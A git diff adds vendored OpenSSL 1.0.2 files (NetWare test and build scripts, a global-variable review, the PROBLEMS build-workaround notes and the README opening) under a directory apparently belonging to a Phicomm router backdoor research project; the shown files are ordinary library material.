+   system("$ssltest -bio_pair -ssl3 -server_auth -client_auth (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv3 with both client and server authentication via BIO pair:");
+   log_output("$ssltest -bio_pair -ssl3 -server_auth -client_auth", $outFile);
+
+   system("ssltest -bio_pair (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv2/sslv3 via BIO pair:");
+   log_output("ssltest -bio_pair", $outFile);
+
+   system("$ssltest -bio_pair -server_auth (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv2/sslv3 with server authentication via BIO pair:");
+   log_output("$ssltest -bio_pair -server_auth", $outFile);
+
+   system("$ssltest -bio_pair -client_auth (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv2/sslv3 with client authentication via BIO pair:");
+   log_output("$ssltest -bio_pair -client_auth", $outFile);
+
+   system("$ssltest -bio_pair -server_auth -client_auth (CLIB_OPT)/>$outFile");
+   log_desc("Testing sslv2/sslv3 with both client and server authentication via BIO pair:");
+   log_output("$ssltest -bio_pair -server_auth -client_auth", $outFile);
+}
+
+
+############################################################################
+sub ca_tests
+{
+   my $outFile = "$output_path\\ca_tst.out";
+
+   my($CAkey)     = "$output_path\\keyCA.ss";
+   my($CAcert)    = "$output_path\\certCA.ss";
+   my($CAserial)  = "$output_path\\certCA.srl";
+   my($CAreq)     = "$output_path\\reqCA.ss";
+   my($CAreq2)    = "$output_path\\req2CA.ss";
+
+   my($CAconf)    = "$test_path\\CAss.cnf";
+
+   my($Uconf)     = "$test_path\\Uss.cnf";
+
+   my($Ukey)      = "$output_path\\keyU.ss";
+   my($Ureq)      = "$output_path\\reqU.ss";
+   my($Ucert)     = "$output_path\\certU.ss";
+
+   print( "\nRUNNING CA TESTS:\n\n");
+
+   print( OUT "\n========================================================\n");
+   print( OUT "CA TESTS:\n");
+
+   system("openssl2 req -config $CAconf -out $CAreq -keyout $CAkey -new (CLIB_OPT)/>$outFile");
+   log_desc("Make a certificate request using req:");
+   log_output("openssl2 req -config $CAconf -out $CAreq -keyout $CAkey -new", $outFile);
+
+   system("openssl2 x509 -CAcreateserial -in $CAreq -days 30 -req -out $CAcert -signkey $CAkey (CLIB_OPT)/>$outFile");
+   log_desc("Convert the certificate request into a self signed certificate using x509:");
+   log_output("openssl2 x509 -CAcreateserial -in $CAreq -days 30 -req -out $CAcert -signkey $CAkey", $outFile);
+
+   system("openssl2 x509 -in $CAcert -x509toreq -signkey $CAkey -out $CAreq2 (CLIB_OPT)/>$outFile");
+   log_desc("Convert a certificate into a certificate request using 'x509':");
+   log_output("openssl2 x509 -in $CAcert -x509toreq -signkey $CAkey -out $CAreq2", $outFile);
+
+   system("openssl2 req -config $OpenSSL_config -verify -in $CAreq -noout (CLIB_OPT)/>$outFile");
+   log_output("openssl2 req -config $OpenSSL_config -verify -in $CAreq -noout", $outFile);
+
+   system("openssl2 req -config $OpenSSL_config -verify -in $CAreq2 -noout (CLIB_OPT)/>$outFile");
+   log_output( "openssl2 req -config $OpenSSL_config -verify -in $CAreq2 -noout", $outFile);
+
+   system("openssl2 verify -CAfile $CAcert $CAcert (CLIB_OPT)/>$outFile");
+   log_output("openssl2 verify -CAfile $CAcert $CAcert", $outFile);
+
+   system("openssl2 req -config $Uconf -out $Ureq -keyout $Ukey -new (CLIB_OPT)/>$outFile");
+   log_desc("Make another certificate request using req:");
+   log_output("openssl2 req -config $Uconf -out $Ureq -keyout $Ukey -new", $outFile);
+
+   system("openssl2 x509 -CAcreateserial -in $Ureq -days 30 -req -out $Ucert -CA $CAcert -CAkey $CAkey -CAserial $CAserial (CLIB_OPT)/>$outFile");
+   log_desc("Sign certificate request with the just created CA via x509:");
+   log_output("openssl2 x509 -CAcreateserial -in $Ureq -days 30 -req -out $Ucert -CA $CAcert -CAkey $CAkey -CAserial $CAserial", $outFile);
+
+   system("openssl2 verify -CAfile $CAcert $Ucert (CLIB_OPT)/>$outFile");
+   log_output("openssl2 verify -CAfile $CAcert $Ucert", $outFile);
+
+   system("openssl2 x509 -subject -issuer -startdate -enddate -noout -in $Ucert (CLIB_OPT)/>$outFile");
+   log_desc("Certificate details");
+   log_output("openssl2 x509 -subject -issuer -startdate -enddate -noout -in $Ucert", $outFile);
+
+   print(OUT "--\n");
+   print(OUT "The generated CA certificate is $CAcert\n");
+   print(OUT "The generated CA private key is $CAkey\n");
+   print(OUT "The current CA signing serial number is in $CAserial\n");
+
+   print(OUT "The generated user certificate is $Ucert\n");
+   print(OUT "The generated user private key is $Ukey\n");
+   print(OUT "--\n");
+}
+
+############################################################################
+sub evp_tests
+{
+   my $i = 'evp_test';
+
+   print( "\nRUNNING EVP TESTS:\n\n");
+
+   print( OUT "\n========================================================\n");
+   print( OUT "EVP TESTS:\n\n");
+
+   if (-e "$base_path\\$i.nlm")
+   {
+       my $outFile = "$output_path\\$i.out";
+       system("$i $test_path\\evptests.txt (CLIB_OPT)/>$outFile");
+       log_desc("Test: $i\.nlm:");
+       log_output("", $outFile );
+   }
+   else
+   {
+       log_desc("Test: $i\.nlm: file not found");
+   }
+}
+
+############################################################################
+sub log_output( $ $ )
+{
+   my( $desc, $file ) = @_;
+   my($error) = 0;
+   my($key);
+   my($msg);
+
+   if ($desc)
+   {
+      print("\r$desc\n");
+      print(OUT "$desc\n");
+   }
+
+      # loop waiting for test program to complete
+   while ( stat($file) == 0)
+      { print(". "); sleep(1); }
+
+
+      # copy test output to log file
+   open(IN, "<$file");
+   while (<IN>)
+   {
+      print(OUT $_);
+      if ( $_ =~ /ERROR/ )
+      {
+         $error = 1;
+      }
+   }
+      # close and delete the temporary test output file
+   close(IN);
+   unlink($file);
+
+   if ( $error == 0 )
+   {
+      $msg = "Test Succeeded";
+   }
+   else
+   {
+      $msg = "Test Failed";
+   }
+
+   print(OUT "$msg\n");
+
+   if ($pause)
+   {
+      print("$msg - press ENTER to continue...");
+      $key = getc;
+      print("\n");
+   }
+
+      # Several of the testing scripts run a loop loading the
+      # same NLM with different options.
+      # On slow NetWare machines there appears to be some delay in the
+      # OS actually unloading the test nlms and the OS complains about.
+      # the NLM already being loaded.  This additional pause is to
+      # to help provide a little more time for unloading before trying to
+      # load again.
+   sleep(1);
+}
+
+
+############################################################################
+sub log_desc( $ )
+{
+   my( $desc ) = @_;
+
+   print("\n");
+   print("$desc\n");
+
+   print(OUT "\n");
+   print(OUT "$desc\n");
+   print(OUT "======================================\n");
+}
+
+############################################################################
+sub compare_files( $ $ $ )
+{
+   my( $file1, $file2, $binary ) = @_;
+   my( $n1, $n2, $b1, $b2 );
+   my($ret) = 1;
+
+   open(IN0, $file1) || die "\nunable to open $file1\n";
+   open(IN1, $file2) || die "\nunable to open $file2\n";
+
+  if ($binary)
+  {
+      binmode IN0;
+      binmode IN1;
+  }
+
+   for (;;)
+   {
+      $n1 = read(IN0, $b1, 512);
+      $n2 = read(IN1, $b2, 512);
+
+      if ($n1 != $n2) {last;}
+      if ($b1 != $b2) {last;}
+
+      if ($n1 == 0)
+      {
+         $ret = 0;
+         last;
+      }
+   }
+   close(IN0);
+   close(IN1);
+   return($ret);
+}
+
+############################################################################
+sub do_wait()
+{
+   my($key);
+
+   if ($pause)
+   {
+      print("Press ENTER to continue...");
+      $key = getc;
+      print("\n");
+   }
+}
+
+
+############################################################################
+sub make_tmp_cert_file()
+{
+   my @cert_files = <$cert_path/*.pem>;
+
+      # delete the file if it already exists
+   unlink($tmp_cert);
+
+   open( TMP_CERT, ">$tmp_cert") || die "\nunable to open $tmp_cert\n";
+
+   print("building temporary cert file\n");
+
+   # create a temporary cert file that contains all the certs
+   foreach $i (@cert_files)
+   {
+      open( IN_CERT, $i ) || die "\nunable to open $i\n";
+
+      for(;;)
+      {
+         $n = sysread(IN_CERT, $data, 1024);
+
+         if ($n == 0)
+         {
+            close(IN_CERT);
+            last;
+         };
+
+         syswrite(TMP_CERT, $data, $n);
+      }
+   }
+
+   close( TMP_CERT );
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/globals.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/globals.txt
new file mode 100644
index 0000000..fe05d39
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/globals.txt
@@ -0,0 +1,254 @@
+An initial review of the OpenSSL code was done to determine how many 
+global variables where present.  The idea was to determine the amount of 
+work required to pull the globals into an instance data structure in 
+order to build a Library NLM for NetWare.  This file contains the results 
+of the review.  Each file is listed along with the globals in the file.  
+The initial review was done very quickly so this list is probably
+not a comprehensive list.
+
+
+cryptlib.c
+===========================================
+
+static STACK *app_locks=NULL;
+
+static STACK_OF(CRYPTO_dynlock) *dyn_locks=NULL;
+
+static void (MS_FAR *locking_callback)(int mode,int type,
+   const char *file,int line)=NULL;
+static int (MS_FAR *add_lock_callback)(int *pointer,int amount,
+   int type,const char *file,int line)=NULL;
+static unsigned long (MS_FAR *id_callback)(void)=NULL;
+static struct CRYPTO_dynlock_value *(MS_FAR *dynlock_create_callback)
+   (const char *file,int line)=NULL;
+static void (MS_FAR *dynlock_lock_callback)(int mode,
+   struct CRYPTO_dynlock_value *l, const char *file,int line)=NULL;
+static void (MS_FAR *dynlock_destroy_callback)(struct CRYPTO_dynlock_value *l,
+   const char *file,int line)=NULL;
+
+
+mem.c
+===========================================
+static int allow_customize = 1;      /* we provide flexible functions for */
+static int allow_customize_debug = 1;/* exchanging memory-related functions at
+
+/* may be changed as long as `allow_customize' is set */
+static void *(*malloc_locked_func)(size_t)  = malloc;
+static void (*free_locked_func)(void *)     = free;
+static void *(*malloc_func)(size_t)         = malloc;
+static void *(*realloc_func)(void *, size_t)= realloc;
+static void (*free_func)(void *)            = free;
+
+/* use default functions from mem_dbg.c */
+static void (*malloc_debug_func)(void *,int,const char *,int,int)
+   = CRYPTO_dbg_malloc;
+static void (*realloc_debug_func)(void *,void *,int,const char *,int,int)
+   = CRYPTO_dbg_realloc;
+static void (*free_debug_func)(void *,int) = CRYPTO_dbg_free;
+static void (*set_debug_options_func)(long) = CRYPTO_dbg_set_options;
+static long (*get_debug_options_func)(void) = CRYPTO_dbg_get_options;
+
+
+mem_dbg.c
+===========================================
+static int mh_mode=CRYPTO_MEM_CHECK_OFF;
+static unsigned long order = 0; /* number of memory requests */
+static LHASH *mh=NULL; /* hash-table of memory requests (address as key) */
+
+static LHASH *amih=NULL; /* hash-table with those app_mem_info_st's */
+static long options =             /* extra information to be recorded */
+static unsigned long disabling_thread = 0;
+
+
+err.c
+===========================================
+static LHASH *error_hash=NULL;
+static LHASH *thread_hash=NULL;
+
+several files have routines with static "init" to track if error strings
+   have been loaded ( may not want seperate error strings for each process )
+   The "init" variable can't be left "global" because the error has is a ptr
+   that is malloc'ed.  The malloc'ed error has is dependant on the "init"
+   vars.
+
+   files:
+      pem_err.c
+      cpt_err.c
+      pk12err.c
+      asn1_err.c
+      bio_err.c
+      bn_err.c
+      buf_err.c
+      comp_err.c
+      conf_err.c
+      cpt_err.c
+      dh_err.c
+      dsa_err.c
+      dso_err.c
+      evp_err.c
+      obj_err.c
+      pkcs7err.c
+      rand_err.c
+      rsa_err.c
+      rsar_err.c
+      ssl_err.c
+      x509_err.c
+      v3err.c
+		err.c
+
+These file have similar "init" globals but they are for other stuff not
+error strings:
+
+		bn_lib.c
+		ecc_enc.c
+		s23_clnt.c
+		s23_meth.c
+		s23_srvr.c
+		s2_clnt.c
+		s2_lib.c
+		s2_meth.c
+		s2_srvr.c
+		s3_clnt.c
+		s3_lib.c
+		s3_srvr.c
+		t1_clnt.c
+		t1_meth.c
+		t1_srvr.c
+
+rand_lib.c
+===========================================
+static RAND_METHOD *rand_meth= &rand_ssleay_meth;
+
+md_rand.c
+===========================================
+static int state_num=0,state_index=0;
+static unsigned char state[STATE_SIZE+MD_DIGEST_LENGTH];
+static unsigned char md[MD_DIGEST_LENGTH];
+static long md_count[2]={0,0};
+static double entropy=0;
+static int initialized=0;
+
+/* This should be set to 1 only when ssleay_rand_add() is called inside
+   an already locked state, so it doesn't try to lock and thereby cause
+   a hang.  And it should always be reset back to 0 before unlocking. */
+static int add_do_not_lock=0;
+
+obj_dat.c
+============================================
+static int new_nid=NUM_NID;
+static LHASH *added=NULL;
+
+b_sock.c
+===========================================
+static unsigned long BIO_ghbn_hits=0L;
+static unsigned long BIO_ghbn_miss=0L;
+static struct ghbn_cache_st
+   {
+   char name[129];
+   struct hostent *ent;
+   unsigned long order;
+   } ghbn_cache[GHBN_NUM];
+
+static int wsa_init_done=0;
+
+
+bio_lib.c
+===========================================
+static STACK_OF(CRYPTO_EX_DATA_FUNCS) *bio_meth=NULL;
+static int bio_meth_num=0;
+
+
+bn_lib.c
+========================================
+static int bn_limit_bits=0;
+static int bn_limit_num=8;        /* (1<<bn_limit_bits) */
+static int bn_limit_bits_low=0;
+static int bn_limit_num_low=8;    /* (1<<bn_limit_bits_low) */
+static int bn_limit_bits_high=0;
+static int bn_limit_num_high=8;   /* (1<<bn_limit_bits_high) */
+static int bn_limit_bits_mont=0;
+static int bn_limit_num_mont=8;   /* (1<<bn_limit_bits_mont) */
+
+conf_lib.c
+========================================
+static CONF_METHOD *default_CONF_method=NULL;
+
+dh_lib.c
+========================================
+static DH_METHOD *default_DH_method;
+static int dh_meth_num = 0;
+static STACK_OF(CRYPTO_EX_DATA_FUNCS) *dh_meth = NULL;
+
+dsa_lib.c
+========================================
+static DSA_METHOD *default_DSA_method;
+static int dsa_meth_num = 0;
+static STACK_OF(CRYPTO_EX_DATA_FUNCS) *dsa_meth = NULL;
+
+dso_lib.c
+========================================
+static DSO_METHOD *default_DSO_meth = NULL;
+
+rsa_lib.c
+========================================
+static RSA_METHOD *default_RSA_meth=NULL;
+static int rsa_meth_num=0;
+static STACK_OF(CRYPTO_EX_DATA_FUNCS) *rsa_meth=NULL;
+
+x509_trs.c
+=======================================
+static int (*default_trust)(int id, X509 *x, int flags) = obj_trust;
+static STACK_OF(X509_TRUST) *trtable = NULL;
+
+x509_req.c
+=======================================
+static int *ext_nids = ext_nid_list;
+
+o_names.c
+======================================
+static LHASH *names_lh=NULL;
+static STACK_OF(NAME_FUNCS) *name_funcs_stack;
+static int free_type;
+static int names_type_num=OBJ_NAME_TYPE_NUM;
+
+
+th-lock.c - NEED to add support for locking for NetWare
+==============================================
+static long *lock_count;
+(other platform specific globals)
+
+x_x509.c
+==============================================
+static int x509_meth_num = 0;
+static STACK_OF(CRYPTO_EX_DATA_FUNCS) *x509_meth = NULL;
+
+
+evp_pbe.c
+============================================
+static STACK *pbe_algs;
+
+evp_key.c
+============================================
+static char prompt_string[80];
+
+ssl_ciph.c
+============================================
+static STACK_OF(SSL_COMP) *ssl_comp_methods=NULL;
+
+ssl_lib.c
+=============================================
+static STACK_OF(CRYPTO_EX_DATA_FUNCS) *ssl_meth=NULL;
+static STACK_OF(CRYPTO_EX_DATA_FUNCS) *ssl_ctx_meth=NULL;
+static int ssl_meth_num=0;
+static int ssl_ctx_meth_num=0;
+
+ssl_sess.c
+=============================================
+static int ssl_session_num=0;
+static STACK_OF(CRYPTO_EX_DATA_FUNCS) *ssl_session_meth=NULL;
+
+x509_vfy.c
+============================================
+static STACK_OF(CRYPTO_EX_DATA_FUNCS) *x509_store_ctx_method=NULL;
+static int x509_store_ctx_num=0;
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/readme.txt b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/readme.txt
new file mode 100644
index 0000000..a5b5faa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/readme.txt
@@ -0,0 +1,19 @@
+
+Contents of the openssl\netware directory
+==========================================
+
+Regular files:
+
+readme.txt     - this file
+do_tests.pl    - perl script used to run the OpenSSL tests on NetWare
+cpy_tests.bat  - batch to to copy test stuff to NetWare server
+build.bat      - batch file to help with builds
+set_env.bat    - batch file to help setup build environments
+globals.txt    - results of initial code review to identify OpenSSL global variables
+
+
+The following files are generated by the various scripts.  They are
+recreated each time and it is okay to delete them.
+
+*.def - command files used by Metrowerks linker
+*.mak - make files generated by mk1mf.pl
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/set_env.bat b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/set_env.bat
new file mode 100644
index 0000000..ace024e
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/Netware/set_env.bat
@@ -0,0 +1,112 @@
+@echo off
+
+rem ========================================================================
+rem   Batch file to assist in setting up the necessary enviroment for
+rem   building OpenSSL for NetWare.
+rem
+rem   usage:
+rem      set_env [target]
+rem
+rem      target      - "netware-clib" - Clib build
+rem                  - "netware-libc" - LibC build
+rem
+rem
+
+if "a%1" == "a" goto usage
+               
+set LIBC_BUILD=
+set CLIB_BUILD=
+set GNUC=
+
+if "%1" == "netware-clib" set CLIB_BUILD=Y
+if "%1" == "netware-clib" set LIBC_BUILD=
+
+if "%1" == "netware-libc" set LIBC_BUILD=Y
+if "%1" == "netware-libc" set CLIB_BUILD=
+
+if "%2" == "gnuc" set GNUC=Y
+if "%2" == "codewarrior" set GNUC=
+
+rem   Location of tools (compiler, linker, etc)
+if "%NDKBASE%" == "" set NDKBASE=c:\Novell
+
+rem   If Perl for Win32 is not already in your path, add it here
+set PERL_PATH=
+
+rem   Define path to the Metrowerks command line tools
+rem   or GNU Crosscompiler gcc / nlmconv
+rem   ( compiler, assembler, linker)
+if "%GNUC%" == "Y" set COMPILER_PATH=c:\usr\i586-netware\bin;c:\usr\bin
+if "%GNUC%" == "" set COMPILER_PATH=c:\prg\cwcmdl40
+
+rem   If using gnu make define path to utility
+rem set GNU_MAKE_PATH=%NDKBASE%\gnu
+set GNU_MAKE_PATH=c:\prg\tools
+
+rem   If using ms nmake define path to nmake
+rem set MS_NMAKE_PATH=%NDKBASE%\msvc\600\bin
+
+rem   If using NASM assembler define path
+rem set NASM_PATH=%NDKBASE%\nasm
+set NASM_PATH=c:\prg\tools
+
+rem   Update path to include tool paths
+set path=%path%;%COMPILER_PATH%
+if not "%GNU_MAKE_PATH%" == "" set path=%path%;%GNU_MAKE_PATH%
+if not "%MS_NMAKE_PATH%" == "" set path=%path%;%MS_NMAKE_PATH%
+if not "%NASM_PATH%"     == "" set path=%path%;%NASM_PATH%
+if not "%PERL_PATH%"     == "" set path=%path%;%PERL_PATH%
+
+rem   Set INCLUDES to location of Novell NDK includes
+if "%LIBC_BUILD%" == "Y" set INCLUDE=%NDKBASE%\ndk\libc\include;%NDKBASE%\ndk\libc\include\winsock
+if "%CLIB_BUILD%" == "Y" set INCLUDE=%NDKBASE%\ndk\nwsdk\include\nlm;%NDKBASE%\ws295sdk\include
+
+rem   Set Imports to location of Novell NDK import files
+if "%LIBC_BUILD%" == "Y" set IMPORTS=%NDKBASE%\ndk\libc\imports
+if "%CLIB_BUILD%" == "Y" set IMPORTS=%NDKBASE%\ndk\nwsdk\imports
+
+rem   Set PRELUDE to the absolute path of the prelude object to link with in
+rem   the Metrowerks NetWare PDK - NOTE: for Clib builds "clibpre.o" is 
+rem   recommended, for LibC NKS builds libcpre.o must be used
+if "%GNUC%" == "Y" goto gnuc
+if "%LIBC_BUILD%" == "Y" set PRELUDE=%IMPORTS%\libcpre.o
+rem if "%CLIB_BUILD%" == "Y" set PRELUDE=%IMPORTS%\clibpre.o
+if "%CLIB_BUILD%" == "Y" set PRELUDE=%IMPORTS%\prelude.o
+echo using MetroWerks CodeWarrior 
+goto info
+
+:gnuc
+if "%LIBC_BUILD%" == "Y" set PRELUDE=%IMPORTS%\libcpre.gcc.o
+rem if "%CLIB_BUILD%" == "Y" set PRELUDE=%IMPORTS%\clibpre.gcc.o
+if "%CLIB_BUILD%" == "Y" set PRELUDE=%IMPORTS%\prelude.gcc.o
+echo using GNU GCC Compiler 
+
+:info
+echo.
+
+if "%LIBC_BUILD%" == "Y" echo Enviroment configured for LibC build
+if "%LIBC_BUILD%" == "Y" echo use "netware\build.bat netware-libc ..." 
+
+if "%CLIB_BUILD%" == "Y" echo Enviroment configured for CLib build
+if "%CLIB_BUILD%" == "Y" echo use "netware\build.bat netware-clib ..." 
+
+goto end
+
+:usage
+rem ===============================================================
+echo.
+echo No target build specified!
+echo.
+echo usage: set_env [target] [compiler]
+echo.
+echo target      - "netware-clib" - Clib build
+echo             - "netware-libc" - LibC build
+echo.
+echo compiler    - "gnuc"         - GNU GCC Compiler
+echo             - "codewarrior"  - MetroWerks CodeWarrior (default)
+echo.
+
+:end
+echo.
+
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/PROBLEMS b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/PROBLEMS
new file mode 100644
index 0000000..3eaab01
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/PROBLEMS
@@ -0,0 +1,213 @@
+* System libcrypto.dylib and libssl.dylib are used by system ld on MacOS X.
+
+
+    NOTE: The problem described here only applies when OpenSSL isn't built
+    with shared library support (i.e. without the "shared" configuration
+    option).  If you build with shared library support, you will have no
+    problems as long as you set up DYLD_LIBRARY_PATH properly at all times.
+
+
+This is really a misfeature in ld, which seems to look for .dylib libraries
+along the whole library path before it bothers looking for .a libraries.  This
+means that -L switches won't matter unless OpenSSL is built with shared
+library support.
+
+The workaround may be to change the following lines in apps/Makefile and
+test/Makefile:
+
+  LIBCRYPTO=-L.. -lcrypto
+  LIBSSL=-L.. -lssl
+
+to:
+
+  LIBCRYPTO=../libcrypto.a
+  LIBSSL=../libssl.a
+
+It's possible that something similar is needed for shared library support
+as well.  That hasn't been well tested yet.
+
+
+Another solution that many seem to recommend is to move the libraries
+/usr/lib/libcrypto.0.9.dylib, /usr/lib/libssl.0.9.dylib to a different
+directory, build and install OpenSSL and anything that depends on your
+build, then move libcrypto.0.9.dylib and libssl.0.9.dylib back to their
+original places.  Note that the version numbers on those two libraries
+may differ on your machine.
+
+
+As long as Apple doesn't fix the problem with ld, this problem building
+OpenSSL will remain as is. Well, the problem was addressed in 0.9.8f by
+passing -Wl,-search_paths_first, but it's unknown if the flag was
+supported from the initial MacOS X release.
+
+
+* Parallell make leads to errors
+
+While running tests, running a parallell make is a bad idea.  Many test
+scripts use the same name for output and input files, which means different
+will interfere with each other and lead to test failure.
+
+The solution is simple for now: don't run parallell make when testing.
+
+
+* Bugs in gcc triggered
+
+- According to a problem report, there are bugs in gcc 3.0 that are
+  triggered by some of the code in OpenSSL, more specifically in
+  PEM_get_EVP_CIPHER_INFO().  The triggering code is the following:
+
+	header+=11;
+	if (*header != '4') return(0); header++;
+	if (*header != ',') return(0); header++;
+
+  What happens is that gcc might optimize a little too agressively, and
+  you end up with an extra incrementation when *header != '4'.
+
+  We recommend that you upgrade gcc to as high a 3.x version as you can.
+
+- According to multiple problem reports, some of our message digest
+  implementations trigger bug[s] in code optimizer in gcc 3.3 for sparc64
+  and gcc 2.96 for ppc. Former fails to complete RIPEMD160 test, while
+  latter - SHA one.
+
+  The recomendation is to upgrade your compiler. This naturally applies to
+  other similar cases.
+
+- There is a subtle Solaris x86-specific gcc run-time environment bug, which
+  "falls between" OpenSSL [0.9.8 and later], Solaris ld and GCC. The bug
+  manifests itself as Segmentation Fault upon early application start-up.
+  The problem can be worked around by patching the environment according to
+  http://www.openssl.org/~appro/values.c.
+
+* solaris64-sparcv9-cc SHA-1 performance with WorkShop 6 compiler.
+
+As subject suggests SHA-1 might perform poorly (4 times slower)
+if compiled with WorkShop 6 compiler and -xarch=v9. The cause for
+this seems to be the fact that compiler emits multiplication to
+perform shift operations:-( To work the problem around configure
+with './Configure solaris64-sparcv9-cc -DMD32_REG_T=int'.
+
+* Problems with hp-parisc2-cc target when used with "no-asm" flag
+
+When using the hp-parisc2-cc target, wrong bignum code is generated.
+This is due to the SIXTY_FOUR_BIT build being compiled with the +O3
+aggressive optimization.
+The problem manifests itself by the BN_kronecker test hanging in an
+endless loop. Reason: the BN_kronecker test calls BN_generate_prime()
+which itself hangs. The reason could be tracked down to the bn_mul_comba8()
+function in bn_asm.c. At some occasions the higher 32bit value of r[7]
+is off by 1 (meaning: calculated=shouldbe+1). Further analysis failed,
+as no debugger support possible at +O3 and additional fprintf()'s
+introduced fixed the bug, therefore it is most likely a bug in the
+optimizer.
+The bug was found in the BN_kronecker test but may also lead to
+failures in other parts of the code.
+(See Ticket #426.)
+
+Workaround: modify the target to +O2 when building with no-asm.
+
+* Problems building shared libraries on SCO OpenServer Release 5.0.6
+  with gcc 2.95.3
+
+The symptoms appear when running the test suite, more specifically
+test/ectest, with the following result:
+
+OSSL_LIBPATH="`cd ..; pwd`"; LD_LIBRARY_PATH="$OSSL_LIBPATH:$LD_LIBRARY_PATH"; DYLD_LIBRARY_PATH="$OSSL_LIBPATH:$DYLD_LIBRARY_PATH"; SHLIB_PATH="$OSSL_LIBPATH:$SHLIB_PATH"; LIBPATH="$OSSL_LIBPATH:$LIBPATH"; if [ "debug-sco5-gcc" = "Cygwin" ]; then PATH="${LIBPATH}:$PATH"; fi; export LD_LIBRARY_PATH DYLD_LIBRARY_PATH SHLIB_PATH LIBPATH PATH; ./ectest
+ectest.c:186: ABORT
+
+The cause of the problem seems to be that isxdigit(), called from
+BN_hex2bn(), returns 0 on a perfectly legitimate hex digit.  Further
+investigation shows that any of the isxxx() macros return 0 on any
+input.  A direct look in the information array that the isxxx() use,
+called __ctype, shows that it contains all zeroes...
+
+Taking a look at the newly created libcrypto.so with nm, one can see
+that the variable __ctype is defined in libcrypto's .bss (which
+explains why it is filled with zeroes):
+
+$ nm -Pg libcrypto.so | grep __ctype
+__ctype B 0011659c
+__ctype2 U         
+
+Curiously, __ctype2 is undefined, in spite of being declared in
+/usr/include/ctype.h in exactly the same way as __ctype.
+
+Any information helping to solve this issue would be deeply
+appreciated.
+
+NOTE: building non-shared doesn't come with this problem.
+
+* ULTRIX build fails with shell errors, such as "bad substitution"
+  and "test: argument expected"
+
+The problem is caused by ULTRIX /bin/sh supporting only original
+Bourne shell syntax/semantics, and the trouble is that the vast
+majority is so accustomed to more modern syntax, that very few
+people [if any] would recognize the ancient syntax even as valid.
+This inevitably results in non-trivial scripts breaking on ULTRIX,
+and OpenSSL isn't an exclusion. Fortunately there is workaround,
+hire /bin/ksh to do the job /bin/sh fails to do.
+
+1. Trick make(1) to use /bin/ksh by setting up following environ-
+   ment variables *prior* you execute ./Configure and make:
+
+	PROG_ENV=POSIX
+	MAKESHELL=/bin/ksh
+	export PROG_ENV MAKESHELL
+
+   or if your shell is csh-compatible:
+
+	setenv PROG_ENV POSIX
+	setenv MAKESHELL /bin/ksh
+
+2. Trick /bin/sh to use alternative expression evaluator. Create
+   following 'test' script for example in /tmp:
+
+	#!/bin/ksh
+	${0##*/} "$@"
+
+   Then 'chmod a+x /tmp/test; ln /tmp/test /tmp/[' and *prepend*
+   your $PATH with chosen location, e.g. PATH=/tmp:$PATH. Alter-
+   natively just replace system /bin/test and /bin/[ with the
+   above script.
+
+* hpux64-ia64-cc fails blowfish test.
+
+Compiler bug, presumably at particular patch level. It should be noted
+that same compiler generates correct 32-bit code, a.k.a. hpux-ia64-cc
+target. Drop optimization level to +O2 when compiling 64-bit bf_skey.o.
+
+* no-engines generates errors.
+
+Unfortunately, the 'no-engines' configuration option currently doesn't
+work properly.  Use 'no-hw' and you'll will at least get no hardware
+support.  We'll see how we fix that on OpenSSL versions past 0.9.8.
+
+* 'make test' fails in BN_sqr [commonly with "error 139" denoting SIGSEGV]
+  if elder GNU binutils were deployed to link shared libcrypto.so.
+
+As subject suggests the failure is caused by a bug in elder binutils,
+either as or ld, and was observed on FreeBSD and Linux. There are two
+options. First is naturally to upgrade binutils, the second one - to
+reconfigure with additional no-sse2 [or 386] option passed to ./config.
+
+* If configured with ./config no-dso, toolkit still gets linked with -ldl,
+  which most notably poses a problem when linking with dietlibc.
+
+We don't have framework to associate -ldl with no-dso, therefore the only
+way is to edit Makefile right after ./config no-dso and remove -ldl from
+EX_LIBS line.
+
+* hpux-parisc2-cc no-asm build fails with SEGV in ECDSA/DH.
+
+Compiler bug, presumably at particular patch level. Remaining
+hpux*-parisc*-cc configurations can be affected too. Drop optimization
+level to +O2 when compiling bn_nist.o.
+
+* solaris64-sparcv9-cc link failure
+
+Solaris 8 ar can fail to maintain symbol table in .a, which results in
+link failures. Apply 109147-09 or later or modify Makefile generated
+by ./Configure solaris64-sparcv9-cc and replace RANLIB assignment with
+
+	RANLIB= /usr/ccs/bin/ar rs
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/README b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/README
new file mode 100644
index 0000000..7878f38
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/README
@@ -0,0 +1,192 @@
+
+ OpenSSL 1.0.2 22 Jan 2015
+
+ Copyright (c) 1998-2011 The OpenSSL Project
+ Copyright (c) 1995-1998 Eric A. Young, Tim J. Hudson
+ All rights reserved.
+
+ DESCRIPTION
+ -----------
+
+ The OpenSSL Project is a collaborative effort to develop a robust,
+ commercial-grade, fully featured, and Open Source toolkit implementing the
+ Secure Sockets Layer (SSL v2/v3) and Transport Layer Security (TLS v1)
+ protocols as well as a full-strength general purpose cryptography library.
+ The project is managed by a worldwide community of volunteers that use the
+ Internet to communicate, plan, and develop the OpenSSL toolkit and its
+ related documentation.
+
+ OpenSSL is based on the excellent SSLeay library developed from Eric A. Young
+ and Tim J. Hudson.  The OpenSSL toolkit is licensed under a dual-license (the
